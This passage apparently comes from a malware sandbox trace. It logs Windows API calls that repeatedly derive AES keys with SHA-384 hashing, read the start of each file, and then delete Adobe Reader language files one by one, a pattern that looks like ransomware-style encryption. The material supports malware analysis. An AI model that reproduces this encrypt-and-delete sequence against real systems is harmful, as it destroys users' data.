hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.719] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6df2 [0223.719] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.796] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.796] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.796] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.798] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nn_NO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nn_no.txt")) returned 1 [0223.799] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.800] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.800] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.800] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.800] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e56 [0223.800] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.817] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.817] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.817] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.818] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl.txt")) returned 1 [0223.819] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.820] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.820] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.820] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.820] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e56 [0223.820] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.824] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.824] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.824] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.825] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pl_PL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pl_pl.txt")) returned 1 [0223.827] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.828] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.828] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.828] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.828] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ebc [0223.828] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.851] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.851] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.851] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.852] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_BR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_br.txt")) returned 1 [0223.854] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.855] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.855] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.855] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.855] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f46 [0223.855] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.858] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.858] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.858] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.860] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt.txt")) returned 1 [0223.861] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.862] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.862] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.862] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.862] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6f50 [0223.862] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.873] CryptDestroyHash (hHash=0x284d768) returned 1 [0223.873] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.873] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.875] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt_preeuro.txt")) returned 1 [0223.971] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.972] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.972] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.972] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.972] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ba2 [0223.972] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0223.989] CryptDestroyHash (hHash=0x284d568) returned 1 [0223.989] CryptDestroyKey (hKey=0x284d728) returned 1 [0223.989] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0223.991] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro.txt")) returned 1 [0223.992] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0223.992] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0223.993] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0223.993] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0223.993] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ba2 [0223.993] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.001] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.001] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.001] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.002] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ro_RO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ro_ro.txt")) returned 1 [0224.004] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.004] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.004] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.004] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.004] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7498 [0224.004] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.021] CryptDestroyHash (hHash=0x284d568) returned 1 [0224.021] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.021] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.022] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru.txt")) returned 1 [0224.025] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.025] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.025] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.025] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.025] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7498 [0224.025] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.170] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.170] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.170] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.171] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_RU.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ru.txt")) returned 1 [0224.173] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.174] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.174] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.174] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.174] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7416 [0224.174] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.180] CryptDestroyHash (hHash=0x284d568) returned 1 [0224.180] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.180] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.181] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ru_UA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ru_ua.txt")) returned 1 [0224.183] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.184] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.184] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.184] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.184] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d76 [0224.184] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.201] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.201] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.201] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.202] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk.txt")) returned 1 [0224.204] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.204] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.204] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.204] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.204] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6d76 [0224.204] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.210] CryptDestroyHash (hHash=0x284d568) returned 1 [0224.210] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.210] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.211] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sk_SK.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sk_sk.txt")) returned 1 [0224.213] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.214] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.214] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.214] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.214] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ef0 [0224.214] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.219] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.219] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.219] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.221] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl.txt")) returned 1 [0224.222] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.222] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.222] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.222] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.223] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ef0 [0224.223] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.272] CryptDestroyHash (hHash=0x284d568) returned 1 [0224.272] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.272] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.273] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl_SI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl_si.txt")) returned 1 [0224.275] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.276] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.276] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.276] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.276] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x715c [0224.276] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.287] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.287] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.287] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.288] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv.txt")) returned 1 [0224.290] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.290] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.290] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.290] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.290] GetFileSize (in: hFile=0x6a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7144 [0224.291] ReadFile (in: hFile=0x6a0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.297] CryptDestroyHash (hHash=0x284d568) returned 1 [0224.297] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.297] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.298] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_FI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_fi.txt")) returned 1 [0224.299] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.300] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.300] CryptHashData (hHash=0x284d768, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.300] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.300] GetFileSize (in: hFile=0x6a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x715c [0224.300] ReadFile (in: hFile=0x6a4, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0224.332] CryptDestroyHash (hHash=0x284d768) returned 1 [0224.332] CryptDestroyKey (hKey=0x284d728) returned 1 [0224.332] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0224.333] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sv_SE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sv_se.txt")) returned 1 [0224.335] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0224.335] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0224.335] CryptHashData (hHash=0x284d568, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0224.335] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d728) returned 1 [0224.335] GetFileSize (in: hFile=0x6a0, 